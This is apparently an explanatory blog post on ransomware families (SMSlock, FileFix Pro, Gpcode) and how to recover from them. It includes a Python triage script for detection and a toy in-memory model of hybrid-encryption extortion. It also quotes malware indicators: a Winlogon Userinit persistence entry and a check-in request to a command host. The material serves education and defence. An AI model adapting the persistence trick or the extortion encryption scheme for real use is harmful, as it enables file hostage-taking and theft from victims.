Ransomware! What is it? How can you avoid it?
What is ransomware?
Ransomware is malicious code written specifically to hold a victim, or the infected system, to ransom: it blocks access to the machine or to the user's files (by locking the desktop or encrypting documents) and demands payment before access is restored.
How does it work?
Ransomware is usually disguised as a genuine program. Most infections start with the user deliberately clicking a link or running an installer in the belief that it is safe software; many arrive as fake alerts such as bogus "corrupt file" or antivirus warnings (see the SQL injection post on this blog).
Once the link is clicked the code runs on the target machine and locks it: the desktop is blocked or the machine no longer boots into a usable session, and every attempt to use it pops up a message telling you to call a phone number or send an SMS to a pre-defined (pseudo-unique) premium-rate number in order to receive an unlock code or removal instructions.
The code is, of course, only supplied after money has reached the malware author. Most of the SMS-lock variants seen at the time of writing originated in Russia.
It usually arrives as a trojan, for example Trj/SMSlock.A on Windows, or the mobile malware Trojan-SMS.Python.Flocker and RedBrowser.
Networkworld put it this way: “Once on the victim’s PC, the Trojan swings into action, encrypting a wide variety of document types such as Microsoft Word .doc files, Adobe Reader .pdf documents, etc., any time one of these documents is opened. It also scrambles the files in Windows’ “My Documents” folder. When a user tries to open one of the encrypted files, an alert pops up saying that a utility called FileFix Pro 2009 will unscramble the data.
“Windows detected that some of your MS Office and media files are corrupted.
Click here to download and install recommended file repair application,” the message reads.
Clicking on the alert downloads and installs FileFix Pro, then demands the user purchase the software.
Price? $50.
The trojan often persists by creating a Winlogon registry entry like this:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = C:\WINDOWS\System32\userinit.exe,c:\malware.exe
Userinit is a comma-separated list of programs that Winlogon runs at every logon. Normally it holds only userinit.exe (the legitimate Windows process that loads the user profile: desktop theme, fonts, wallpaper and so on), so appending c:\malware.exe makes Windows launch a malware instance alongside userinit.exe every time the user logs in. A quick check is to compare that value against the single expected userinit.exe entry.
The following outbound check-in request was observed once the trojan was running:
GET /registerguid.php?guid={98607c80-9a71-494f-a81e-32b7bb536a0c}&wid=59&u=6&number=35743798&install=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: ogggooogoggoog.com
Connection: Keep-Alive
Can you beat that?
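As an added example (not code from the original post or from any of the vendors quoted on it), the two indicators above can be turned into a small triage script: one function flags anything other than the legitimate userinit.exe in the Winlogon Userinit value, and one parses proxy or web-filter log lines for the registerguid.php check-in and pulls out the GUID and the number parameter. The registry values and log lines in the script are constructed samples, the log format (client, host, request line) is assumed, and reading the number parameter as the SMS number shown to the victim is an assumption.

```python
"""Triage helpers for the SMSlock-style indicators described above.

Added example, not code from the original post. Sample inputs are constructed;
the proxy log format (client host request-line) is assumed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Only userinit.exe belongs in the Winlogon Userinit value.
LEGIT_USERINIT = {r"c:\windows\system32\userinit.exe", "userinit.exe"}

# Shape of the check-in request seen on the page (assumed stable enough to match on).
CHECKIN_RE = re.compile(r"^(?:GET|POST) (?P<path>/registerguid\.php\?\S+) HTTP/1\.[01]$")


def userinit_extras(value):
    """Return every comma-separated Userinit entry that is not the legitimate
    userinit.exe. Winlogon launches each listed program at logon, which is
    exactly why the locker appends itself here."""
    extras = []
    for entry in value.split(","):
        entry = entry.strip().strip('"')
        if entry and entry.lower() not in LEGIT_USERINIT:
            extras.append(entry)
    return extras


def read_live_userinit():
    """On Windows, read the live Userinit value; elsewhere return None."""
    try:
        import winreg
    except ImportError:
        return None
    key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                         r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon")
    value, _ = winreg.QueryValueEx(key, "Userinit")
    return value


def parse_checkin(request_line):
    """Parse a registerguid.php request line; return its parameters or None
    if the line is not a check-in of that shape."""
    m = CHECKIN_RE.match(request_line.strip())
    if not m:
        return None
    params = parse_qs(urlsplit(m.group("path")).query)
    if "guid" not in params or "number" not in params:
        return None
    return {
        "guid": params["guid"][0],
        # Assumed to be the SMS number the victim is told to text.
        "number": params["number"][0],
        "install": params.get("install", ["?"])[0],
    }


def scan_proxy_log(lines):
    """Walk 'client host request-line' log lines and collect check-ins."""
    hits = []
    for line in lines:
        try:
            client, host, request_line = line.split(" ", 2)
        except ValueError:
            continue  # malformed line; not a check-in
        info = parse_checkin(request_line)
        if info:
            hits.append({"client": client, "host": host, **info})
    return hits


# Constructed sample data for offline use.
SAMPLE_USERINIT = r"C:\WINDOWS\System32\userinit.exe,c:\malware.exe"
SAMPLE_LOG = [
    "10.0.0.5 ogggooogoggoog.com GET /registerguid.php?guid={98607c80-9a71-494f-a81e-32b7bb536a0c}&wid=59&u=6&number=35743798&install=1 HTTP/1.1",
    "10.0.0.7 www.example.com GET /index.html HTTP/1.1",
    "10.0.0.9 ogggooogoggoog.com GET /registerguid.php?guid={0f0f0f0f-0000-4000-8000-000000000000}&wid=59&u=6&number=35743798&install=0 HTTP/1.1",
]

if __name__ == "__main__":
    print("Userinit extras:", userinit_extras(read_live_userinit() or SAMPLE_USERINIT))
    for hit in scan_proxy_log(SAMPLE_LOG):
        print("check-in from", hit["client"], "guid", hit["guid"], "number", hit["number"])
```

Run it on a Windows host and it reads the live Userinit value; anywhere else it falls back to the constructed sample. Feeding real proxy logs only requires adapting the three-field split in scan_proxy_log to your log format.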
How do they collect? According to a post on the FireEye blog:
These SMS codes use paid “rooms”. These “rooms” have a concept like 1900 numbers where it costs money to phone in. Every time someone sends an SMS to one of these rooms, a fixed amount of money is deducted from the sender’s balance and it gets transferred to the owner of the room.

According to Wikipedia,
Ransomware typically propagates as a conventional computer worm, entering a system through, for example, a vulnerability in a network service or an e-mail attachment. It may then:
- Disable an essential system service or lock the display at system startup.
- Encrypt some of the user’s personal files. Encrypting ransomware were originally referred to as cryptoviruses, cryptotrojans or cryptoworms.
In both cases, the malware may extort by:
- Prompting the user to enter a code obtainable only after wiring payment to the attacker or sending an SMS message and accruing a charge.
- Urging the user to buy a decryption or removal tool.
More sophisticated ransomware may hybrid-encrypt the victim’s plaintext with a random symmetric key and a fixed public key. The malware author is the only party that knows the needed private decryption key. The author who carries out this cryptoviral extortion attack offers to recover the symmetric key for a fee.
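To make that scheme concrete, here is an added toy model of the hybrid encryption (not code from the original post, from Wikipedia, or from any real ransomware family). It uses a deliberately tiny RSA modulus, two primes just above one million, so that the "crack the key" path is feasible by trial division; the symmetric cipher is an HMAC-SHA256 counter-mode keystream, an assumption standing in for whatever cipher real samples used. What it shows: the file key is fresh and random per file, only the attacker's private key (or factoring the modulus) recovers it, and the factoring route that worked on short keys is exactly what a 1024-bit modulus closes off.

```python
"""Toy model of the hybrid "cryptoviral extortion" scheme described above:
each file gets a fresh random symmetric key, and only that key is encrypted
under the attacker's fixed RSA public key.

Added example, not code from the original post or from any real malware.
Assumptions: ~40-bit RSA modulus (two primes just above 10**6) so trial
division factors it quickly; textbook RSA with no padding; HMAC-SHA256
counter-mode keystream as the symmetric cipher. Everything stays in memory.
"""
import hashlib
import hmac
import math
import secrets


def is_prime(n):
    if n < 2:
        return False
    return all(n % d for d in range(2, math.isqrt(n) + 1))


def next_prime(n):
    while not is_prime(n):
        n += 1
    return n


def keystream_xor(key, data):
    """CTR-style stream cipher: XOR data with HMAC-SHA256(key, counter) blocks.
    Symmetric, so the same call both encrypts and decrypts."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hmac.new(key, counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def rsa_keypair(p, q, e=65537):
    """Textbook RSA from two primes (toy only). Returns (n, e, d)."""
    n, phi = p * q, (p - 1) * (q - 1)
    while math.gcd(e, phi) != 1:
        e += 2
    return n, e, pow(e, -1, phi)


# The attacker generates the keypair once; only (N, E) ships inside the malware.
P = next_prime(1_000_000)
Q = next_prime(P + 1)
N, E, D = rsa_keypair(P, Q)


def extort_encrypt(plaintext, n, e):
    """Per-file step: fresh session key, file encrypted symmetrically,
    session key wrapped with the public key, plaintext key discarded."""
    session_key = secrets.randbelow(n - 2) + 2        # 2 <= k < n keeps RSA invertible
    ciphertext = keystream_xor(session_key.to_bytes(8, "big"), plaintext)
    wrapped_key = pow(session_key, e, n)
    return wrapped_key, ciphertext


def recover_with_private_key(wrapped_key, ciphertext, n, d):
    """The 'pay the fee' path: only the holder of d can unwrap the session key."""
    session_key = pow(wrapped_key, d, n)
    return keystream_xor(session_key.to_bytes(8, "big"), ciphertext)


def factor_modulus(n):
    """Trial division: fine for this toy modulus, hopeless at 1024 bits."""
    for p in range(2, math.isqrt(n) + 1):
        if n % p == 0:
            return p, n // p
    raise ValueError("no factor found")


def recover_by_factoring(wrapped_key, ciphertext, n, e):
    """The vendor path for short keys: factor n, derive d, unwrap, decrypt."""
    p, q = factor_modulus(n)
    _, _, d = rsa_keypair(p, q, e)
    return recover_with_private_key(wrapped_key, ciphertext, n, d)


if __name__ == "__main__":
    doc = b"Quarterly report (constructed sample document)"
    wk, ct = extort_encrypt(doc, N, E)
    print("private-key recovery ok:", recover_with_private_key(wk, ct, N, D) == doc)
    print("factoring recovery ok:  ", recover_by_factoring(wk, ct, N, E) == doc)
    print("N =", N, "factors to", factor_modulus(N))
```

Note what the key size changes: factor_modulus loops up to the square root of N, about a million steps here, so the "vendor" recovery finishes instantly. At 660 bits that loop is already out of reach and the only hope is a dedicated factoring effort; at 1024 bits neither works, which is why the defence has to happen before encryption (no untrusted installers, patched software, offline backups) rather than after.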
How dangerous are they?
Very dangerous.
The first known ransomware, the 1989 PC Cyborg Trojan, only encrypted filenames with a weak symmetric cipher.
Current variants do not self-propagate; their primary distribution vector is the hundreds of active blackhat search engine optimization (SEO) campaigns that lure users into installing fake codecs.
Extortive ransomware reappeared in 2005. By mid-2006, families such as Gpcode, TROJ.RANSOM.A, Archiveus, Krotten, Cryzip and MayArchive had begun using more sophisticated RSA encryption schemes, with ever-increasing key sizes.
Gpcode.AG, which was detected in June 2006, encrypted with a 660-bit RSA public key. Gpcode.AK, detected in June 2008, uses a 1024-bit RSA key, which is believed to be large enough to be computationally infeasible to break without a concerted distributed effort.
Of this key size, Aleks Gostev, senior virus analyst at Kaspersky, wrote on the company’s blog: “We estimate it would take around 15 million modern computers, running for about a year, to crack such a key.”
David Perry, the global director of education for antivirus vendor Trend Micro Inc., said of this form of attack: “This does look like a new tactic ... but all online fraud is just minor variations of classic con games. This is just the ‘Bank Examiner’ played out on the Internet.”
He continued: “This isn’t the first time the tactic’s been used, but it is remarkably polished; we’ve not seen ‘ransomware’ with this level of sophistication.”
How to avoid or fix it?
SMSlock.A is considered the work of less technically sophisticated authors, which makes it fairly easy to bypass: the unlock code is computed locally by the malware itself rather than issued by a server, so once the algorithm is pulled out of the binary anyone can generate valid codes.
Dr.Web has done exactly that and released a generator for deactivation codes, so affected users do not have to pay.
Victims of the FileFix Pro 2009 scam can now heave a sigh of relief as they do not need to shell out cash to restore their files, according to researchers, who have figured out how to decrypt the data. The Bleeping Computer site, for instance, has a free program called “Anti FileFix” available for download that unscrambles files corrupted by the Trojan. The security company FireEye Inc. has also created a free online decrypter which restores files to their original condition.
This family proved persistent enough that Symantec recently published a technical report on the threat and also provided a tool to generate the unlock key.
Unfortunately, that tool does not work for the variant with MD5 6211D3AF9D2EE3DCD44C948A4ECF6633. Instead of a 10- or 11-digit code starting with 411, this variant uses a 9-digit code starting with 412. Another interesting detail from the VirusTotal report: Norton Anti-Virus is not among the 19 listed engines that detected this sample as a threat.
Kaspersky and other anti-virus companies had previously recovered the secret key for every earlier version of Gpcode, but this time the malware author was wiser: the current Gpcode encrypts victim files under a 1,024-bit RSA public key, which experts presently consider uncrackable. Your anti-virus will not bail you out here, and neither will a decrypter, because without the author’s private key there is nothing to decrypt with. The only reliable recovery is a backup taken before the infection. However, for assistance you can go here.
Bottom line: never click on links or run “repair” utilities you did not ask for, keep your software patched, and keep an offline backup of your documents so that no amount of encryption can hold them to ransom. Period.